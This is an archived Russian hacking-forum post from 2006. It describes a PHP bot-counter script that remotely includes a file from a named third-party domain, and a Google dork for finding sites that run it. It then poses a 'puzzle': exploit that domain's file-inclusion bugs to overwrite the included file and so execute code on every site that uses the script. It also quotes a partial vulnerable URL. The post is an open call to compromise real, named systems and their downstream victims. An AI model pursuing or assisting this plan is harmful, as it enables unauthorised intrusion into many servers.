ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Головоломочка
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Головоломочка
  #1  
Старый 19.02.2006, 14:22
Аватар для vfDcs
vfDcs
Новичок
Регистрация: 26.07.2005
Сообщений: 13
Провел на форуме:
36703

Репутация: 0
Отправить сообщение для vfDcs с помощью ICQ
По умолчанию Головоломочка
Наткнулся в нете на сайтик, там лежит архивчик, в архивчике пара скриптов на пхп. Скрипты предназначены для учёта посещений ботов (Гугль, яндекс и пр), конечно, полная ерунда, да ещё и с багами. Моё внимание привлек инклуд внизу скрипта sebotinfo.php:

include ('http://reliz.domrutorg.com/sebotnews.php');

Забавно, но нашлись люди установившие этот скрипт без изменений

Воткнув в гугле inurl:sebotinfo.php я нашёл несколько сайтов на которых стоит этот скрипт. Подозреваю, что сайтов гораздо больше.

Задача - перезаписать фаил http://reliz.domrutorg.com/sebotnews.php. Сейчас он не содержит никакого пхп кода.

Сайт содержит множество инклуд багов. Пхп работает в сейф-моде, что, в принципе, не мешает использовать пхпшные функции для работы с файлами, но на попытки записи и на попытки чтения некоторых файлов отвечает - премисион дениед.

вот один из инклудбагов:

http://reliz.domrutorg.com/index.php...st/index&page=
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ